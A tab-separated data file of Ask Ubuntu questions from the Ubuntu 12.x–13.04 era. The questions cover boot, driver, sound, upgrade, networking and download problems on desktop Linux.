283787	how do i boot ubuntu from my usb flash drive ?	i have been using windows 7 home basic for years , and now i 'm bored and my pc is getting slower by the day . so i decided to try ubuntu . i formatted an 8gb transcend usb flash drive and put ubuntu in it with the help of universal usb installer from pendrivelinux.com as instructed by ubuntu.com here . i tried to get help on how to boot from this usb here but i could n't get my pc bios setup to boot from it . i press enter to get to the menu as soon as the system starts , then try changing the primary boot to removable disk ( my flash drive ) by getting into the bios setup which does n't help . i also try to change temporary boot location to the flash drive but in vain . the windows screen shows up no matter what i do and i never get a hint of the ubuntu install menu . i 've tried doing this before and was unsuccessful a couple of times , and i really want to try ubuntu . i want to know the exact steps i should follow to boot ubuntu 12.10 from my usb stick . my system specs are : microsoft windows 7 home basic version 6.1.7601 service pack 1 build 7601 system type x86-based pc processor intel ( r ) atom ( tm ) cpu 330 @ 1.60ghz , 1596 mhz , 2 core ( s ) , 4 logical processor ( s )
283789	nvidia driver for geforce gtx 660	i am having troubles installing the nvidia driver on my new installation of ubuntu gnome remix ( 12.10 , at first ) . i would be very grateful if i could receive some help from a kind soul out there . i have tried the following so far : setting nvidia-current and nvidia-current-updates from the gui setting nvidia-current after downloading sources : sudo apt-get purge nvidia-* sudo apt-get install linux-source sudo apt-get install linux-headers-generic sudo add-apt-repository ppa : ubuntu-x-swat/x-updates sudo apt-get update sudo apt-get install nvidia-current trying the same with this line instead : sudo apt-add-repository ppa : noobslab/nvidia-quantal after the three tries i updated to 13.04 and tried all the same again . the result is for all cases : the machine boots into what looks like an old version of gnome , the screen resolution is very low . when i try to open the nvidia settings i get an error . typing this after installation : sudo nvidia-xconfig does not help . i have a asus geforce gtx 660 2gb physx cuda the system works , but laggs , when i use the nouveau driver . i will be forever gratefull if someone can help me out , i have tried for a good 7 hours to fix the problem now .
283796	sound in ubuntu 12.04 suddenly missed	everything was ok a few hours ago . i was watńhing some ted video when the sound suddenly just gone to nowhere . i 'm not a very experienced linux user , so i tried to restart the system - it did n't help anyway . then i typed alsamixer to check out whether pcm and speaker were turned on . they were . i also tried to update alsamixer to the latest version - it did n't work to . i even tried this `` fundamental '' way from one russian forum : sudo apt-get update ; sudo apt-get dist-upgrade ; sudo apt-get install linux-sound-base alsa-base alsa-utils gdm ubuntu-desktop linux-image-`uname -r` libasound2 ; sudo apt-get -y -- reinstall install linux-sound-base alsa-base alsa-utils gdm ubuntu-desktop linux-image-`uname -r` libasound2 ; killall pulseaudio ; rm -r ~/.pulse* ; sudo usermod -ag `cat /etc/group | grep -e '^pulse : ' -e '^audio : ' -e '^pulse-access : ' -e '^pulse-rt : ' -e '^video : ' | awk -f : ' { print $ 1 } ' | tr '\n ' ' , ' | sed 's : , $ : :g'` `whoami` did n't help . what else can i do ? lspci | grep audio 00:1b.0 audio device : intel corporation 82801i ( ich9 family ) hd audio controller ( rev 03 ) if i can give you more info - please let me know how to get this info and i 'll be able to give it to you .
283806	error upgrading to 13.04 , `` 'ascii ' codec ca n't encode character ``	when trying to upgrade to 13.04 from 12.10 , i get the following error : traceback ( most recent call last ) : file `` /usr/bin/do-release-upgrade '' , line 108 , in < module > print ( _ ( `` checking for a new ubuntu release '' ) ) unicodeencodeerror : 'ascii ' codec ca n't encode character '\xf3 ' in position 32 : ordinal not in range ( 128 )
283809	how to turn off beep on suspend in xubuntu	when i close the lid or type pm-suspend , i get a beep from my thinkpad x220 running xubuntu . how do i remove that beep ? it is louder if the volume is louder , so it 's from the regular speakers ( also , alsamixer has beep muted and lsmod says i have neither snd_pcsp nor pcspkr loaded ) . i think the beep came with an update some months ago .
283812	touchpad on a fujitsu lifebook a532	my touchpad is not working as it should . well , it works but cant use 2-finger scroll . i get this : axept @ axept-lifebook : ~ $ xinput -- list virtual core pointer id=2 [ master pointer ( 3 ) ] virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ps/2 generic mouse id=14 [ slave pointer ( 2 ) ] how to enable 2-fingerscroll and a proper driver ?
283820	different wallpaper per workspace - ubuntu 12.10	ubuntu newbie here . i want a different wallpaper for each workspace . i tried ccsm and gconf-editor , and neither worked . and compiz seems to crash on occasion . i 'm using ubuntu 12.10 , and i ca n't find a single tutorial for 12.10 specifically .
283826	laptop getting hot after installing ubuntu 12.04 : possibly a videocard driver problem	today i installed ubuntu 12.04.2 version . and my laptop runs really hot.my video card is ati mobility radeon hd 4650.this is not my first ubuntu installation.i have used ubuntu in past and `` additional driver '' program recognized my graphic card and installed necessary drivers.now my graphic card is not recognized in additional drivers . please tell me how to install necessary drivers for my graphic card.last time i installed ubuntu , i had to face to this heat problem because of graphic card drivers .
283829	ubuntu 12.04 i ca n't download anything ... at all	i recently upgraded from maveric ( 10.10 ) to 12.04 ( by wiping out maveric from my system completely ) i was using a pen drive , so it messed up my grub . i finally managed to reinstall the grub on the machine and now it boots fine . now , i ca n't download anything from the software-center or manually . i followed some advice on the forums that included purging the software centre , but once i tried to reinstall , it refused . i checked my software sources they all seem ok . i 'm set to main server . i ca n't install anything .
283830	how to change the font of various terminal emulators ?	mainly : gnome terminal xfce terminal konsole lxterminal terminator guake yakuake urxvt xterm mrxvt
283838	ubuntu booted from live usb freezing on boot message	this is my first time really getting to know linux . i 'm booting ubuntu 12.10 on my hp g65 notebook , which is pre installed with windows 7 64 bit , from a live usb . the hp loads just fine and proceeds to try to boot ubuntu but it freezes up on a black screen with syslinux 4.06 edd 2012-10-23 copyright ( c ) 1994-2012 h. petter anvin et al and a blinking bar under it at the top . i 'm tired of windows and i want something far more stable . and try to keep the talk on a noob understandable level .
283839	ubuntu 12.10 unattended installations cd	my work require me to build an unattended installation cd for ubuntu 12.10 . i have searched on the google but there is no clue or tutorial .
283843	intel hd graphics ( integrated ) minecraft graphical freezes and glitches - graphics driver or card ?	i have a lenovo g570 laptop , which played minecraft perfectly 1 or 2 months ago . now , whenever i play the game , i 'm faced with freezes , which sometimes crash unity ( with some error message like intel_do_flush_locks ( ) failed : blah ) and graphical glitches ( a diagonal twisted segment of the screen occurred once ) . as i said , i do n't know if this is a result of installing opencl drivers , a graphics card problem , or a software one . thanks in advance , whiskers75
283845	how to install ubuntu 12 in place of fedora 18 while preserving my dual boot windows 7 installation ?	i have installed win7 first , then i did install fedora 18 and now i boot through the fedora 's boot loader to either of the systems . what i want now is to replace fedora 18 by ubuntu 12 without breaking my windows installation ( it would be critical not to break my windows at the moment ; very sensitive timing ) thanks in advance
283853	unknown admin password	i wanted to make an new admin profile and delete the old one ( long story ) , but i forgot to set a password . now i can only enter guest session and the administrator account is asking me about a password i have n't even set ! what is the password that ubuntu automatically sets for a new admin profile ?
283856	werid colour for xubuntu title bar	the image above shows weird blue colour ( formerly it was greyiish silver ) for xubuntu title bar . it occurred without any reason one day i booted at the logon screen , as usual selected 'xubuntu-session ' ( i have also installed gnome ) but the title bar exhibited this blue phenomenon ... everything else is normal ! i never tweaked default theme do n't know why it happened , by default xubuntu theme is 'greybird'
283859	ubuntu 12.10 is terribly slow	i have 2.5g intel cpu and 3g ram . but click any button in live cd version need to wait 3 minutes . my dvd is burned .
283860	moved from windows lost all my files - any file recovery tools	previously i was using the windows 7 . when i try to replace the windows to ubuntu i lost all of my other drive files . is there any way to recover these files . i have my project files and some important files in one of my folder . anyone pls help ... ok is there any chance to recover a single file . i have photorec and testdisk and dono how to use them . i do now need `` presentation.ppt '' file is this possible .
283865	unable to install qt-sdk unmet dependencies	i tried to install qt-sdk under ubuntu 12.10 how can i fix this issue ? install log : apt-get install qt-sdk reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : qt-sdk : depends : qt4-designer but it is not going to be installed depends : qt4-dev-tools but it is not going to be installed e : unable to correct problems , you have held broken packages .
283873	installation from live usb does n't find my partitions	i have a sony win8 ultrabook . when i boot from a live usb , ubuntu 12.10 will access my partial ssd to access data . but when i go to install it , it gets to the point of changing partitions , but shows none at all . it throws an error , but will not allow me to install ubuntu . it does this whether i have secure boot enabled or not , same with legacy boot . i contacted sony to see if they could help , but all i got was `` sorry , but sony does n't support ubuntu . we love win 8 and only support that '' kind of response . so here i am ... please help ! preferably , i 'd prefer a dual boot -- - my wife likes win 8 . and i 've had a few successful dual boots with win8 , but only on hp computers .
283884	pictures do n't show up in facebook if i use ubuntu	a few days ago my browser ( firefox ) has stopped loading images when using facebook.com . i tried google-chrome and it turned out that photos do n't load up there too . however , the pictures show up without any problem when i use firefox in windows although firefox have the exact same version as in the one in linux . the steps i have tried so far are : remove all cookies , cache and reset to the default settings removed .mozilla folder and set it manually but the problem becomes big now no photo in facebook appear here is photo that shows the problem : while images show up fine in other websites : so as you can see the problem is only in linux whether it is firefox or google-chrome
283886	how can i resume a download with wget ?	i use wget with flashgot in firefox to download . i ca n't resume download if i pause ( by ctrl+c ) . because , i do n't know the commandline arguments of wget to manually add it in a terminal . so i did following steps to get those commandline arguments , when wget started downloading . after these procedures , i pressed ctrl+c to pause download : ps -a | grep -i wget and copied the pid of wget suppose it is 16760 xargs -0 echo < /proc/16760/cmdline > ls.txt ( from http : //stackoverflow.com/questions/821837/how-to-get-the-command-line-args-passed-to-a-running-process-on-unix-linux-syste ) now , ls.txt contains : wget -- trust-server-names -c -o psy_gentleman_m_v_hd720.mp4 -- directory-prefix=/home/aliyans/downloads -- referer=https : //www.youtube.com/watch ? v=aso_zypdnsq -- user-agent=mozilla/5.0 ( x11 ; ubuntu ; linux i686 ; rv:19.0 ) gecko/20100101 firefox/19.0 http : //r5 -- -sn-gxap5ojx-h55e.c.youtube.com/videoplayback ? ipbits=8 & sparams=cp % 2cgcr % 2cid % 2cip % 2cipbits % 2citag % 2cratebypass % 2csource % 2cupn % 2cexpire & gcr=in & source=youtube & ip=115.242.140.33 & mv=m & ms=au & fexp=906370 % 2c913574 % 2c913811 % 2c932000 % 2c932004 % 2c906383 % 2c916911 % 2c916910 % 2c902000 % 2c901208 % 2c919512 % 2c929903 % 2c925714 % 2c929119 % 2c931202 % 2c900821 % 2c900823 % 2c909419 % 2c911416 % 2c908529 % 2c930807 % 2c919373 % 2c930803 % 2c906836 % 2c920201 % 2c929602 % 2c930101 % 2c930609 % 2c926403 % 2c900824 % 2c912711 & ratebypass=yes & mt=1366553656 & sver=3 & itag=22 & id=0123bfcf2a5d9ec4 & newshard=yes & expire=1366577026 & upn=byxhihsd5uc & key=yt1 & cp=u0hvs1vsvv9huenonv9ntflbokrwzzi0mejkedbt & signature=bd13d36dd291572b599b536476ec1247e7c487c9.34f8b3c3f0bf8198c68c4490ec4257650a569dc6 i copied the above line and pasted in a terminal . but it showed : bash : syntax error near unexpected token ` ( ' how can i resume a download from wget which was started by flashgot ? or is there any other method ?
283889	sound not playing when unplug front speakers	i have my headphones in the back port and my speakers in my front port . if i start the pc up with the front speakers then it refuses to play out of my headphones even if i unplug the speakers . i tried reloading alsa and checking in alsamixer but i ca n't get it to play from the back port without restarting the computer with the front speakers unplugged .
283895	software center reinstallation fails	updating software catalog ... this may take a moment . info : softwarecenter.db.pkginfo_impl.aptcache : aptcache.open ( ) warning : softwarecenter.db.update : the file : '/usr/share/app-install/desktop/sonic-visualiser : x-sonicvisualiser.desktop ' could not be read correctly . the application associated with this file will not be included in the software catalog . please consider raising a bug report for this issue with the maintainer of that application warning : softwarecenter.db.update : the file : '/usr/share/app-install/desktop/sonic-visualiser : x-sonicvisualiser-layer.desktop ' could not be read correctly . the application associated with this file will not be included in the software catalog . please consider raising a bug report for this issue with the maintainer of that application warning : softwarecenter.db.update : the file : '/usr/share/app-install/desktop/workrave : workrave.desktop ' could not be read correctly . the application associated with this file will not be included in the software catalog . please consider raising a bug report for this issue with the maintainer of that application software catalog update was successful . that is what i got when reinstalling my software center . i tried to reinstall it after there was a problem doing installations via it . now , this came , and well , what is the next step to do in order to get it work again ? its boring to always have to use the terminal for installations . this is the terminal output when attempting to install audacity in my software center : http : //pastebin.com/vkc2exg0 edit : i opened a bug report with this issue . the /usr/share/app-install/desktop/sonic-visualiser : x-sonicvisualiser.desktop : here . , existed . the other files didnt exist/was empty
283900	where i should install grub bootloader , and chainloading bootloader ?	i wanted to install ubuntu studio , and i 'm confused where i should install grub . i wanted to chainload bootloader ( because i want to dual-boot ) and keeps windows bootloader , because i 'm using easybcd . here is the list of my partitions : /dev/sda ( hd 500 gb ) /dev/sda1 132 gb ( windows 8 bootloader ) /dev/sda2 141 gb ( ntfs-formatted partition for windows 8 ) /dev/sda3 151 gb ( ntfs-formatted partition for windows 8 ) /dev/sda4 ( extended partition ) /dev/sda5 11 gb ( fat32 ) /dev/sda6 25 gb ( ubuntu ) ( mount : / ) # # planned # # /dev/sda7 5 gb ( home folder ( /home ) ) /dev/sda8 1 gb ( swap memory ) # # planned # # which partition should i choose to install grub ? i 'm new to linux . thanks for answer .
283904	ubuntu 13.04 suspend not working	my sony vaio vpceh27fd ( e series ) will not sleep after i close the lid , it stays on i can hear the fan and hard drive on , when i wake it up sometimes it wont respond and i have to force power off . please help ; ' ( i really want to stay on ubuntu .
283908	how can i install and use powerline plugin ?	powerline is a plug-in to display informational and beautiful statusline for vim , tmux and shell prompt for bash , zsh . vim statusline : how can i install and setup powerline for different applications and shells in ubuntu ?
283910	paste and match style	you know , in os x , you can paste some text with an option to match a style of the environment it 's being pasted into . can i do it somehow in ubuntu ?
283912	gpu under constant 25-30 % load	currently on a fresh install of 12.10 with unity and the newest amd 13.3 beta 3 catalyst driver . but even when on the desktop with no programs open it seems to be idling at 25-30 % gpu usage and 47-51째c . i 'm using the command `` aticonfig -- odgc -- odgt '' to check for the gpu load and temps . under xfce and lxde without compositing the gpu idles at 0-1 % so i assume this is a compositing issue ? but using 30 % of a 7970m while idling is just crazy .
283915	message : `` battery dies in few seconds '' -bad battery-status or problem with power management ?	i 'm still a beginner , but i have used ubuntu and other distros before . i run a german setup so i 'm not shure about the correct words . so here 's the problem : my netbook ( asus x201e ) with fresh ubuntu 12.10 ( 32bit ) runs without problems for ~2 hours on battery . it was idling most of the time , so battery was still at 80 % . suddenly i get the message that `` battery life was low and the system is shutting down to save energy '' . the next thing i read was that the `` battery has been removed '' , which was n't possible since 1 ) battery is soldered in this model and 2 ) removing the battery would have cut the energy supply immediately . then suddenly estimated battery life was back to 3 hours . however the system went into hibernation a few seconds later . i could n't turn on the netbook again until plugging the power cable . it also booted normaly instead of `` waking up '' from hibernation . is this a hardware problem ? the netbook is new , so i could return it . or is it the software reading the battery status wrong ? battery life should however be approx 5 hours and not 2 . additional information : - bios has no power management/power saving options afaik - i installed laptop-mode-tools , did n't change the defaults though any advice ? thanks for your help .
283917	new computer boot/live usb issue ubuntu 12.10	built a new computer yesterday and the specs are as follows : amd a6 5400k process with amd radeon hd7540d graphics ( built-in ) fm2-a75ia-e53 mobo 8gb crucial ram i can install and run ubuntu 12.04 . but if i try to update to ubuntu 12.10 or just install 12.10 , the computer just hangs on boot at a blank purple screen . note : i tried 13.04 , same issue . please help , i would very much like to use a newer ubuntu than 12.04 !
283923	google+ integration for the new friends app	on ubuntu 13.04 , i do not see a way to integrate google+ feed data into the friends app . this option is available for twitter and facebook . is google+ feed data integration on the cards anytime soon ? thanks
283926	can i set the launcher to only be visible when i 'm on the desktop ?	i 'd like to show the launcher when i am on my desktop and hide it when an application is running . how can i personalize it ?
283933	proxychains configuration	i have downloaded proxychains and configured it to run with tor . i want a chain of 3 or more proxies . 3 will be enough . the problem is finding proxies that are up and running i just keep getting messages saying denied/timeout could i have a copy of someones proxychains.conf file that is up and working with alive proxies or give me a copy of proxies in the right arrangement i.e socks4/5 https etc ip port socks5 1.81.97.243 6673 socks5 1.81.148.187 6673 socks5 1.81.127.201 6673 socks5 1.61.149.199 6673 socks5 95.78.55.48 1080 socks4 178.54.32.58 50610 socks5 178.150.156.219 13579 socks5 95.78.18.183 1080 socks4 93.85.4.0 52342 socks5 5.167.238.35 1080 socks5 95.78.48.149 1080
283936	directory and file permissions	i recently installed ubuntu 12.10 . i am the only user , and would like to be able to drag files from directory to directory . 1 ) how can i open up permission to do this ? do i do this from root ? 2 ) is there a command that i can enter into the terminal ? if so , what would an example command be ? i am thinking it must be something like grant user r-w-x ability from the the closest file to root as possible ( so that i have cascading capability throughout the rest of the files ) . if i need to do this directory by directory i will , mainly i am used to being able to do pretty much whatever i wanted within a windows environment . as time goes by , i realize doing this from the command line will be something that i will want to do . however , i did not realize the bit of time it is taking me to do some simple things . i am just wanting to get up to speed quickly .
283937	nexus 7 touchscreen mouse freezes	i 'm running ubuntu 13.04 on my nexus 7 , and all is good until the mouse stops working . the `` button1 '' gets stuck . i was wondering if anyone knows the name of the mouse module being used ( so i could map a key to modprobe it ) , or perhaps an alternate way to reset the mouse . any information helps . i 've done extensive googling and nothing has been of use .
283941	ubuntu with java error	i have oracle java installed on my computer . latest version 1.7 and path variables set properly . but most applications in ubuntu from software center that require java needs open jdk iced tea etc . i want to install applications in ubuntu without installing any other versions of jdk/jre . how 's that possible . edit just giving you an example . i have oracle java ( jdk 7 ) installed but when i want to install netbeans via software center it is asking to install open jdk . netbeans i had to install directly via downloading the binaries . similarly many other softwares exist .
283944	update manager gone , __init__.py error in terminal ( solved )	when attempting to open the update-manager from the gui , nothing appears . when attempting it from the terminal , i am getting a weird error i have never seen before . i have reinstalled the update-manager in an attempt to fix it ( even with -- purge ) , and no differences . here is the output from the terminal : simen @ ubuntu : ~ $ update-manager traceback ( most recent call last ) : file `` /usr/bin/update-manager '' , line 28 , in < module > from gi.repository import gtk file `` /usr/lib/python3/dist-packages/gi/__init__.py '' , line 27 , in < module > from ._gi import _api , repository importerror : no module named _gi what is those errors caused by ? i would need those to be fixed somehow , and can i reinstall pygi somehow ? i am not into this sadly enough.. this is 13.04 . thanks for your attention to inform later readers : after updating via apt-get with dist-upgrade once again , the error was gone . locked
283949	youtube video useless after the last update	after some updates recently , youtube videos now run extremely jerkily . almost like they are swimming in superglue . it also slows my computer down to a speed akin to a snail on diazepam . running ubuntu 12.04.01 and using google chrome version 26.0.1410.63 . firefox seems to run videos fine , but it 's not my preferred browser . cheers jj1
283950	mount : ca n't read proc/mounts	i 've installed ubuntu , but when it is loading it gives following error : mount : ca n't read proc/mounts . ca n't fount such file or directory however , os continues loading but when i try to enter system using my login/password , which i entered during installation , it fails to login . does someone know what is problem here ? i 've tried reinstall ubuntu several times , but problem still occurs . medium from i installed : windows 7 . installed ubuntu with wubi , where i chose separate disk g ( ntfs file format ) , set installation size : 18gb , chose ubuntu in dropdownlist , language english ( gb ) and set username and password .
283954	double-tap on scrolllock key fails to change kvm target machine	using a belkin kvm switch . normally , i 'd be able to double-tap scroll-lock and choose a number corresponding to the machine i wish to switch to , however , since i upgraded from 12.10 to 13.04 beta 2 , double-tapping the scroll-lock no longer changes machines . i had assumed that this `` double-tap '' was hardcoded into the kvm unit and it should always work , but it seems i was wrong . anybody have any ideas ? the kvm is a belkin 2-port 1dl102p ( with built-in cables and audio support ) , and does n't have any buttons on the unit itself , so there 's no `` manual override '' or `` hard reset '' buttons . looks like this : any thoughts , ideas , or suggestions ? is it some kind of key-binding glitch ?
283961	removing photorec recovered files	i have number of folders ( over 60 folders ) located in my file system folder and two folders with lock symbol on folder icon recup_dir.1 , recup_dir.2 and photorec.ses . i have removed testdisk using synaptic package manager . but these folders are still there . any help ?
283964	gaming with virtualbox , has it worked for you ?	currently i am using windows 8 . i have a virtual box with ubuntu set up for development . aside from that i sometimes just want to relax and enjoy a game ( battlefield 3 , skyrim , saints row : the third , etc ) after hours of research and development . i want to have my main machine with linux , and install windows on a virtual box . what i want to know , from those who have tried or seen it : how is the performance ? i 've never been clear on this but , even if i install the correct drivers on the windows box , will it matter ? at least on this part , i 'm just curious how it offload . which drivers will matter the most . mouse and keyboard integration , i 'll be honest , sometimes the mouse integration in virtual box is a bit frustrating , mouse cursor disappears , etc . i 'm not sure if this is the right place to ask . i 'm merely trying to come back to linux , yet i 'm a pc gamer so i ca n't throw away steam . i 'm aware of the linux client , but most of those games wo n't work . if there 's a right place to ask this whether stackexchange sites or any other site let me know . cheers and i hope those in the same position find a middle ground .
283967	d-link dge-530t with ubuntu 12.10	i really could use some help . i am quite new to this and i am officially completely lost here . i have been searching the web for a few hours now to no avail . i am running ubuntu 12.10 and i have installed a d-link dge-530t to go along with the new high speed modem that was just installed in the house . since i am on the internet i am assuming that i am using default drivers . my speed is maxed out at 7 mbit . in my windows 7 boot it is at 20mbit . i have downloaded the latest drivers and unzipped them to a folder on my desktop i have the following linux instructions but have absolutely no clue what they mean or how to do them . is there anyone that can give me a hand and guide me through this step by step ? this is the linux device driver released for realtek ethernet controllers , which are listed as following . 1 . rtl8169s/sb/sc ( gigabit ethernet with pci interface ) 2 . rtl8168b ( gigabit ethernet with pci-express interface ) 3 . rtl8101e ( fast ethernet with pci-express interface ) kernel source tree ( supported versions 2.4.x or 2.6.x ) compiler/binutils for kernel compilation unpack the tarball : unzip r1000_linuxdrv_vxx.zip change to the directory : cd r1000 if you are running the target kernel , then you should be able to do : make clean modules ( as root or with sudo ) make install depmod -a the media can be forced to one of the 5 modes as follows . cmd : `` insmod r1000 media = set_media '' for example : `` insmod r1000 media = 0x04 '' will force phy to operate in 100mpbs half-duplex . set_media can be : _10_half = 0x01 _10_full = 0x02 _100_half = 0x04 _100_full = 0x08 _1000_full = 0x10 force media type for multiple cards could be performed as : `` insmod r1000 media=0x04,0x10 '' which force phy to operate at 100mbps half-duplex and 1000mbps full-duplex . supports jumbo frame hardware tx/rx flow control thank you very much .
283968	i get dependency issues with linux-image-pae while upgrading	justsmit1 @ moodle : ~ $ sudo aptitude safe-upgrade the following packages will be upgraded : linux-image-generic-pae 1 packages upgraded , 0 newly installed , 0 to remove and 0 not upgraded . need to get 0 b/2,578 b of archives . after unpacking 1,024 b will be used . do you want to continue ? [ y/n/ ? ] y dpkg : dependency problems prevent configuration of linux-image-generic-pae : linux-image-generic-pae depends on linux-image-3.2.0-36-generic-pae ; however : package linux-image-3.2.0-36-generic-pae is not installed . dpkg : error processing linux-image-generic-pae ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already errors were encountered while processing : linux-image-generic-pae e : sub-process /usr/bin/dpkg returned an error code ( 1 ) a package failed to install . trying to recover : dpkg : dependency problems prevent configuration of linux-image-generic-pae : linux-image-generic-pae depends on linux-image-3.2.0-36-generic-pae ; however : package linux-image-3.2.0-36-generic-pae is not installed . dpkg : error processing linux-image-generic-pae ( -- configure ) : dependency problems - leaving unconfigured errors were encountered while processing : linux-image-generic-pae does anyone know how to fix this ? i 've tried sudo apt-get clean and sudo apt-get autoremove along with sudo apt-get install -f. none of these have fixed my issue .
283971	ubuntu 12.10 boots to purple screen after upgrading from 12.04 ?	i 'm new to the whole linux world . i had windows7 , so in order to not to lose it i made a new partition for ubuntu 12.04 . after the installation everything was good except a huge problem , my lapto has an intel hd graphics card and an amd radeon hd 6470m but to my surprise i saw the system used the intel graphics card whenever i logged into ubuntu . i searched over the internet but could n't get anything . and now comes the monumental problem , after upgrading from 12.04 to 12.10 when i rebooted and selected ubuntu from grub mneu , the whole booting procedure stacks every time at the purple screen and never reaches the login screen i do n't know what to do anymore i feel kinda desperate . unfortunately i cant provide any more info . because i call myself newbie at the linux environment . if this whole thing rings any bell , is there any way we can fix this ?
283972	how to speed up the android emulator in ubuntu 12.10	on ubuntu 12.10 , android emulator is too slow , how can i speed it up ? i installed sdk with adt-bundle-linux-x86-20130219 . i tried to use host gpu and get some more speed , but when i launch it , there is still some lagging .
283973	no wan connection , but lan ok	after the last automatic update internet is down whether i use wifi or ethernet . i can however connect to router , and web server on the lan side . pinging any web site fails . i use version 12.0 4 . i 'm about to download new cd and do fresh install . any tips to fix my connection before i install new version of ubuntu ? ifconfig eth0 link encap : ethernet hwaddr 00:21:9b : db:5a : ca up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) interrupt:17 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) wlan0 link encap : ethernet hwaddr 00:1d : e0:50 : c8 : d1 inet addr:192.168.1.3 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :21d : e0ff : fe50 : c8d1/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:162 errors:0 dropped:0 overruns:0 frame:0 tx packets:182 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:30715 ( 30.7 kb ) tx bytes:23103 ( 23.1 kb ) netstat -nr kernel ip routing table destination gateway genmask flags mss window irtt iface 0.0.0.0 192.168.1.254 0.0.0.0 ug 0 0 0 wlan0 169.254.0.0 0.0.0.0 255.255.0.0 u 0 0 0 wlan0 192.168.1.0 0.0.0.0 255.255.255.0 u 0 0 0 wlan0
283974	install a package manager without package manager	i 'm doing some work on a really , really minimalistic debian dist and noticed that there is no package manager on it . can anyone tell me how i can fix this ? there is no gui but i have a internet connection . /johan
283979	wi-fi connectivity does n't work in ubuntu 12.10	i have a dell inspiron 6400 and i run ubuntu 12.10 along side windows 7 . the problem is that in windows the wifi button works perfectly fine , the light can be turned on and off and so on , also the internet works fine there . but in ubuntu i ca n't get the wifi to turn on . i event tried the additional driver tab in software resources and it does n't work .
283982	can public files in ubuntu one be found through search engines ?	i know that the published files are not private but its not clear for me . lets take a look at the sharing service of google drive , you can share your files in google drive on 3 way : private ( it 's not part of my question ! ) public on the web ( anyone on the internet can find and access ) anyone with the link ( anyone who has the link can access ) now my two questions about published files in my ubuntu one cloud are : can anyone who does n't have the link , access my published files ? ( as long as i do n't share the published link with anyone on the web ) can anyone find them via search machines like google ?
283984	what is the shutdown command ?	i want to create a shutdown icon for the launcher in 13.04 . in former versions of ubuntu i used this desktop file and put it in the launcher : .local/share/applications/indicator-session-shutdown.desktop [ desktop entry ] name=shut down tryexec=/usr/lib/indicator-session/gtk-logout-helper exec=/usr/lib/indicator-session/gtk-logout-helper -- shutdown icon=system-shutdown terminal=false type=application onlyshowin=unity ; categories=system ; version=1.0 x-ubuntu-gettext-domain=indicator-session i wonder if /usr/lib/indicator-session/gtk-logout-helper -- shutdown is still the correct command in 13.04 . here is a screenshot with old shutdown dialog : here is a screenshot with new shutdown dialog :
283985	`` unable to load session 'ubuntu ' '' in 12.04	i removed unity via the software store and rebooted . now i got the following error : unable to load session 'ubuntu' i ca n't log in as guest either .
283986	baobab : disable graphical respresentation on the right ?	in the disk space analyzer baobab , the graphical representation on the right part occupies very much space . how can i disable it ? thanks .
283987	how to change permissions for a usb adapter ?	i have an rs232 to usb adapter and i need to change permissions on /dev/ttyusb0 to make a ham radio interface program work . so far i have tried sudo at the command line with no success . i tried sudo nautilus and was able to make the permission changes using the gui , and then the program worked , however , when i re-booted the machine , the permissions were re-set to `` root '' . what am i doing wrong ?
283988	caps lock icon for wireless keyboard ?	i recently replaced my old wired keyboard with a logitech model k330 wireless unit . the keyboard performs perfectly . my only problem is that i am a lousy typist . many times when typing an a , i will accidentally hit the caps lock key . is there a mod available that would notify to the user if caps lock in enabled ? something simple like the word `` caps '' in a colored background on the bottom of the screen ? no , i do n't like the cattle prod under the seat notification method . that is much too noisy .
283992	really weird hidden dash bug involving openjdk and minecraft	i 'm pretty sure my problem is unique . i 'm using openjdk 7 to play minecraft , in order to avoid wrangling with wine . recently , this setup has started to give me problems . i am getting `` system program problem detected '' error dialogs , and prompts to send error reports to apport . this happens even when i 'm not playing mc - i 'll see it at startup , for example - but i get one of these dialogs several times an hour when i play . moreover , every so often , the game will freeze . sometimes the event will be identical to a lag spike , but some of the time , something really weird will happen to my computer : it briefly flashes through all the windows that i have up , and then settles on a single one - google chrome , usually - and both the dashboard and the info-bar along the top of the screen will vanish . i 'll still be able to use whatever window it settles on , but i wo n't be able to switch between windows , or do anything that involves the dash , and the only way to restart my computer is to hard-reboot by holding down the power button . i do n't know if keyboard shortcuts for switching windows , etc . work , mostly because i do n't know the keyboard shortcuts . this has not happened so far when i 'm not playing minecraft . i have been trying to use several mods , listed below , and installing them using mcpatcher 3.0.3 ; i 'm pretty sure that the problems started when i used mcpatcher to install optifine and modloader at the same time , and had a file conflict . it happens even after i removed all mods from the jar , and after `` force updating '' ; i 'm currently experimenting with using mcpatcher to completely un-patch the game . so far , i have experienced the lag-spikes , but it has n't crashed my computer yet . if it turns out that it does n't work , i 'll try getting a fresh jar file . i will provide updates as they come by editing the post . mods : single player commands - version 4.6 ( i do n't know if this can actually be installed with mcpatcher . ) toomanyitems for 1.5.1 ( includes mar 23 , 2013 as a date ; i do n't remember if that 's when i downloaded it or if it 's something else , although it 's probably the former ) timber ! ( 1.5.1 ) modloader ( as far as i know , it 's for 1.5.1 . i should make sure of that . ) optifine 1.5.1 hd b3 does anyone have any idea what is happening to me ?
283995	ubuntu installation problem	i am new to ubuntu and may not quite understand the installation processes . i have 2 hard drives on my computer . a normal ide c : / ( 50gb ) and sata e : / ( about 460gb ) . i have formated my sata drive in order to install ubuntu as my next operating system . i used an ( wubi ) installer run from a usb . when it starts installing it works to about a half way and then pops up an error message saying : '' could not retrieve the required disk image files for more information , please see the log file : c : /docume~1/admini~1/locals~1/temp/wubi-12.10-rev273.log ! '' please help , i 'd really like to have ubuntu on my old computer .
